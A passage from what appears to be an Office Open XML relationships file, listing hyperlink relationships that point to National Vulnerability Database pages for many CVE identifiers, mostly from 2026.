Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81871" TargetMode="External" Id="rId987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81872" TargetMode="External" Id="rId988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86774" TargetMode="External" Id="rId989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87047" TargetMode="External" Id="rId990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87113" TargetMode="External" Id="rId991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88255" TargetMode="External" Id="rId992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88819" TargetMode="External" Id="rId993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89186" TargetMode="External" Id="rId994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90771" TargetMode="External" Id="rId995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92184" TargetMode="External" Id="rId996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92217" TargetMode="External" Id="rId997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92360" TargetMode="External" Id="rId998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92402" TargetMode="External" Id="rId999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92526" TargetMode="External" Id="rId1000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92527" TargetMode="External" Id="rId1001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92781" TargetMode="External" Id="rId1002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19543" TargetMode="External" Id="rId1003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55073" TargetMode="External" Id="rId1004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55846" TargetMode="External" Id="rId1005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89329" TargetMode="External" Id="rId1006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-51769" TargetMode="External" Id="rId1007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13276" TargetMode="External" Id="rId1008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18495" TargetMode="External" Id="rId1009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18555" TargetMode="External" Id="rId1010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20309" TargetMode="External" Id="rId1011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59944" TargetMode="External" Id="rId1012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63523" TargetMode="External" Id="rId1013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69642" TargetMode="External" Id="rId1014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77490" TargetMode="External" Id="rId1015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81201" TargetMode="External" Id="rId1016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81900" TargetMode="External" Id="rId1017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84560" TargetMode="External" Id="rId1018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88034" TargetMode="External" Id="rId1019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88036" TargetMode="External" Id="rId1020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88976" TargetMode="External" Id="rId1021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92584" TargetMode="External" Id="rId1022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18061" TargetMode="External" Id="rId1023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18069" TargetMode="External" Id="rId1024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73436" TargetMode="External" Id="rId1025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73457" TargetMode="External" Id="rId1026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73463" TargetMode="External" Id="rId1027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77190" TargetMode="External" Id="rId1028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82056" TargetMode="External" Id="rId1029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82063" TargetMode="External" Id="rId1030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82290" TargetMode="External" Id="rId1031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86338" TargetMode="External" Id="rId1032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16435" TargetMode="External" Id="rId1033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18149" TargetMode="External" Id="rId1034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19662" TargetMode="External" Id="rId1035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19941" TargetMode="External" Id="rId1036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49837" TargetMode="External" Id="rId1037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49838" TargetMode="External" Id="rId1038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55235" TargetMode="External" Id="rId1039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70091" TargetMode="External" Id="rId1040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73449" TargetMode="External" Id="rId1041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77119" TargetMode="External" Id="rId1042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80125" TargetMode="External" Id="rId1043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82561" TargetMode="External" Id="rId1044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82720" TargetMode="External" Id="rId1045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84522" TargetMode="External" Id="rId1046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84554" TargetMode="External" Id="rId1047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85024" TargetMode="External" Id="rId1048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87123" TargetMode="External" Id="rId1049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89156" TargetMode="External" Id="rId1050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92081" TargetMode="External" Id="rId1051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92091" TargetMode="External" Id="rId1052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92591" TargetMode="External" Id="rId1053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92595" TargetMode="External" Id="rId1054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20120" TargetMode="External" Id="rId1055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20290" TargetMode="External" Id="rId1056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78301" TargetMode="External" Id="rId1057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54246" TargetMode="External" Id="rId1058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87910" TargetMode="External" Id="rId1059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75944" TargetMode="External" Id="rId1060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79642" TargetMode="External" Id="rId1061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79970" TargetMode="External" Id="rId1062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89172" TargetMode="External" Id="rId1063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28899" TargetMode="External" Id="rId1064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43741" TargetMode="External" Id="rId1065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43762" TargetMode="External" Id="rId1066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64714" TargetMode="External" Id="rId1067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64756" TargetMode="External" Id="rId1068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65345" TargetMode="External" Id="rId1069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65348" TargetMode="External" Id="rId1070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65369" TargetMode="External" Id="rId1071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65377" TargetMode="External" Id="rId1072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65380" TargetMode="External" Id="rId1073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65382" TargetMode="External" Id="rId1074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65393" TargetMode="External" Id="rId1075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65401" TargetMode="External" Id="rId1076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65402" TargetMode="External" Id="rId1077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65404" TargetMode="External" Id="rId1078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65405" TargetMode="External" Id="rId1079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65406" TargetMode="External" Id="rId1080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65407" TargetMode="External" Id="rId1081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65409" TargetMode="External" Id="rId1082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65411" TargetMode="External" Id="rId1083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65413" TargetMode="External" Id="rId1084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68830" TargetMode="External" Id="rId1085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68831" TargetMode="External" Id="rId1086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68842" TargetMode="External" Id="rId1087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69286" TargetMode="External" Id="rId1088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69343" TargetMode="External" Id="rId1089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69457" TargetMode="External" Id="rId1090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69527" TargetMode="External" Id="rId1091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69808" TargetMode="External" Id="rId1092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69862" TargetMode="External" Id="rId1093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70145" TargetMode="External" Id="rId1094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76081" TargetMode="External" Id="rId1095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76104" TargetMode="External" Id="rId1096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77159" TargetMode="External" Id="rId1097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77491" TargetMode="External" Id="rId1098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79975" TargetMode="External" Id="rId1099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80054" TargetMode="External" Id="rId1100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80058" TargetMode="External" Id="rId1101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80167" TargetMode="External" Id="rId1102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82920" TargetMode="External" Id="rId1103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84489" TargetMode="External" Id="rId1104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84491" TargetMode="External" Id="rId1105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84517" TargetMode="External" Id="rId1106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84521" TargetMode="External" Id="rId1107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84523" TargetMode="External" Id="rId1108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84534" TargetMode="External" Id="rId1109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84540" TargetMode="External" Id="rId1110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84541" TargetMode="External" Id="rId1111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84552" TargetMode="External" Id="rId1112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84555" TargetMode="External" Id="rId1113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84556" TargetMode="External" Id="rId1114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84558" TargetMode="External" Id="rId1115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84569" TargetMode="External" Id="rId1116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84576" TargetMode="External" Id="rId1117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84583" TargetMode="External" Id="rId1118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84585" TargetMode="External" Id="rId1119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84589" TargetMode="External" Id="rId1120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84601" TargetMode="External" Id="rId1121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84612" TargetMode="External" Id="rId1122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84617" TargetMode="External" Id="rId1123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84624" TargetMode="External" Id="rId1124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84628" TargetMode="External" Id="rId1125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86878" TargetMode="External" Id="rId1126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86883" TargetMode="External" Id="rId1127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86897" TargetMode="External" Id="rId1128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86903" TargetMode="External" Id="rId1129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86905" TargetMode="External" Id="rId1130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86910" TargetMode="External" Id="rId1131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86911" TargetMode="External" Id="rId1132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86924" TargetMode="External" Id="rId1133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88035" TargetMode="External" Id="rId1134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88054" TargetMode="External" Id="rId1135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90517" TargetMode="External" Id="rId1136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90522" TargetMode="External" Id="rId1137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90565" TargetMode="External" Id="rId1138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90619" TargetMode="External" Id="rId1139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90690" TargetMode="External" Id="rId1140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90710" TargetMode="External" Id="rId1141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90995" TargetMode="External" Id="rId1142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92366" TargetMode="External" Id="rId1143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92380" TargetMode="External" Id="rId1144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92405" TargetMode="External" Id="rId1145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-23176" TargetMode="External" Id="rId1146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12758" TargetMode="External" Id="rId1147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12766" TargetMode="External" Id="rId1148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13407" TargetMode="External" Id="rId1149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15887" TargetMode="External" Id="rId1150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16186" TargetMode="External" Id="rId1151" 